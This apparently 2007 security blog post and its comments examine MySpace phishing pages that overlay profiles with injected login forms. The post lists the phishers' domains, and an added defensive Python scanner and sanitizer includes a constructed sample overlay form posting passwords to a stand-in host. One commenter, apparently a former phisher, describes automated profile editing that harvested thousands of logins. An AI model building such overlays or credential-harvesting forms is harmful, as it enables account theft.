Style Injection Phishing
This is certainly not new, but I happened across an interesting link to a bunch of phishing sites built into MySpace. Instead of being normal phishing sites that rely on JavaScript injection or email, the MySpace phishing sites rely only on injecting a form that overlays the page itself. The URL to find these is a simple Google dork.
At the time of writing there were 56 phishing sites on MySpace. Obviously not huge as a percentage, but it’s scary that there are any at all. It’s unclear what they want to do with these URLs; however, I spent a few minutes mapping out the URLs used by the phishers:
- 5 x hur.be
- 4 x willgle.com
- 2 x r3voluti0n.com
- 1 x m3rm.org
- 1 x spaceadder.info
- 1 x coolton.dajoob.com
- 1 x www.profilespider.com
- 1 x www.itfailz.net
- 1 x artexstudios.com
- 1 x members.lycos.co.uk
- 1 x login-myspace.logindotspace.com
- 1 x www.googleidols.com
So only 20 were working/alive when I checked. I was able to find one example of the PHP script used (almost all of them were written in PHP). This one was simply wildly misconfigured. A number of them appeared to be old and were hobbled by MySpace, who changed the URL to a “..”, which had the effect of breaking the script, but the pages were still messed up (as if MySpace pages aren’t already messed up enough to begin with). Pretty ugly.
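The overlay technique described above, as an added example that is not part of the original post: a hypothetical Python scanner that flags forms posting off-site from inside an absolutely or fixed-positioned element, plus a sanitizer that strips that positioning from user-supplied inline CSS. The host name and the profile fragment it runs on are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse
# CSS that lets an injected element sit on top of the host page.
POSITION_RE = re.compile(r"position\s*:\s*(absolute|fixed)\b", re.I)
VOID = {"input", "img", "br", "hr", "meta", "link", "area", "base", "col"}  # no closing tag: never pushed

class OverlayFormFinder(HTMLParser):
    """Flag <form>s posting off-site from inside a positioned (overlay) element."""
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.stack = []      # (tag, inside_overlay) for each open element
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        inherited = self.stack[-1][1] if self.stack else False
        inside = inherited or bool(POSITION_RE.search(a.get("style") or ""))
        if tag == "form":
            host = (urlparse(a.get("action") or "").hostname or "").lower()
            foreign = host and host != self.site_host and not host.endswith("." + self.site_host)
            if inside and foreign:
                self.findings.append({"action": a.get("action"), "line": self.getpos()[0]})
        if tag not in VOID:
            self.stack.append((tag, inside))

    def handle_endtag(self, tag):
        while self.stack:            # pop back to the matching open tag; tolerates sloppy HTML
            if self.stack.pop()[0] == tag:
                break

def find_overlay_forms(html, site_host):
    p = OverlayFormFinder(site_host)
    p.feed(html)
    return p.findings

def strip_overlay_positioning(style):
    """Mitigation: drop position:absolute/fixed from user-supplied inline CSS."""
    decls = [d.strip() for d in style.split(";") if d.strip()]
    return "; ".join(d for d in decls if not POSITION_RE.search(d))

# Constructed sample profile fragment (hypothetical hosts, not taken from any real site).
SAMPLE_PROFILE = """
<div style="position:absolute; top:0; left:0; width:100%; height:100%; z-index:9999">
  <form action="http://login-phish.example/login.php" method="post">
    <input name="email"><input name="password" type="password"></form></div>
<div><form action="http://www.myspace.com/index.cfm"><input name="q"></form></div>
<div><form action="http://counter.example/hit"><input name="id"></form></div>
"""
```

Only the first form is flagged: the second posts to the host site itself, and the third posts off-site but is not positioned over the page.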
May 6th, 2007 at 7:34 am
It’s essentially the same as the SEO trick of using a DIV overlay on an entire page to redirect users’ clicks. I just can’t fathom that people wouldn’t realize that they’ve been scammed when they continually “login” only to constantly receive the same message. In a way it’s also quite similar to the example script you created where the element follows the mouse so no matter where a click is presented it’s also intercepted. I’m not sure how their overlay was set up size-wise, because I’m on the Wii and can’t view the source, but it doesn’t cover the entire page properly on the Wii’s Opera browser.
May 6th, 2007 at 10:08 am
I didn’t see an error message; if you look at the source that I included, it simply does a redirect as an output, nothing more. If you don’t have JS turned on you just see a blank page.
May 6th, 2007 at 10:25 am
Sorry, I was referring to the first Google search result I got. I did laugh when I looked at the script you posted, because I do know who wrote that exact script though, and know where it originates from, but it’d be “breaking rules 1 & 2” if I said where it came from.
May 6th, 2007 at 11:12 am
I don’t think it matters, that script is a) not technically interesting and b) non-functional in its current state.
May 6th, 2007 at 12:06 pm
That’s what happens when basic phishing scripts fall into the hands of people with no understanding of how to use them. Although to most of us this isn’t anything new or exciting, this script has been floating around a certain site for the past 2 months off and on. It was in a Winrar file with specific instructions on how to use it, but a lot of the kids who downloaded it aren’t technically inclined.
May 7th, 2007 at 12:42 pm
Aha, I noticed my site that got suspended in September made it on your list. Interesting! (logindotspace.com)
Well, it’s not that the people using the script are not technically inclined; it’s the fact that they were using automated programs to edit a person’s profile and update the profile layout.
Which made it considerably easier than manually editing 2k profiles to get 10k to 12k logins in return. Rather, software created for myspace phishers/spammers and so forth, a program called “MyChanger”, is used in all spamming aspects.
Made the job so much easier, although myspace had a hell of a lot of errors back then which would cause the scripts to not display correctly, if you had not noticed all the %%%% signs on the page; the layout didn’t fit the screen etc. Although a fair amount did turn out alright, 30% never did and were bugged out like the ones displayed in the google dork.
This year every spammer and phisher has moved on due to lack of profit coming from myspace. It’s not worth the time; we used to make 2k a day through CPA deals last year. Now you’d be lucky to make $100-$200 a day.
May 7th, 2007 at 1:31 pm
I wasn’t saying the sites were up, sorry if that was confusing… I was only saying that the page that was pointing to them was still functional. It would be easy enough for someone to re-reg that domain.
July 29th, 2009 at 12:16 pm
So, I think I have downloaded something that has done a php script and has overlaid the page I want to visit with a fake to make me enter my details and then intercept them [Habbo.co.uk]. What do I do to get rid of this and get the original page back? I don’t know much about this subject so sorry if I sound stupid, feel free to correct me.
Thanks Andy